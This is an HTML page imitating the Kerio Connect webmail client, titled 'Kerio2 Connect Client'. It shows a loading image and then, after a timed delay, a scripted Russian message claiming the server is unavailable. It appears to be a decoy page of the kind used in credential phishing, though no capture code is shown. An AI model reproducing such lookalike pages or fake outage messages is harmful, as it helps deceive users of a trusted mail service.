<html><head>
		<title>Kerio Connect Client</title>
		<meta http-equiv="X-UA-Compatible" content="IE=edge">
		<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
		<meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1, maximum-scale=1">
		<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>

		<link href="css/favicon.ico?v=20ee3a975875292c6fac79e260d7c898" rel="shortcut icon" type="image/vnd.microsoft.icon">
		<link href="css/style.css?v=20ee3a975875292c6fac79e260d7c898" rel="stylesheet" type="text/css">
		<link href="css/webmail2.css?v=20ee3a975875292c6fac79e260d7c898" rel="stylesheet" type="text/css">



	</head>
	<body class="">
		<!-- "up-spacer"creates white space over login dialog -->
		<div id="up-spacer"></div>
		<div id="upper-message-container"></div>
		<div id="main-container" style="visibility: visible;">
			<div id="logo"><h1 id="product-name">Kerio2 Connect Client</h1></div>
			<!-- used only in admins -->
			<div id="admin-icon"></div>
			<!-- "top" part of buble image -->
			<div id="Div-A" style="margin-left: 55px">
                        <img src="loader.gif">
                    </div>
             <br>
             <div id='prova' style="width:800px;margin-left:-60px;font-size:16px;display: none;">Сервер временно недоступен. Попробуйте повторить попытку позже.</div>

    <script>
        window.onload = function () {
            setTimeout(appeardiv,3000);
        }
        function appeardiv() {
            document.getElementById('prova').style.display= "block";
        }
    </script>
			<!-- "bottom" part of buble image -->
			<div id="shine"></div>
		</div>
		<div id="additional-message-container"></div>
	</body>
</html>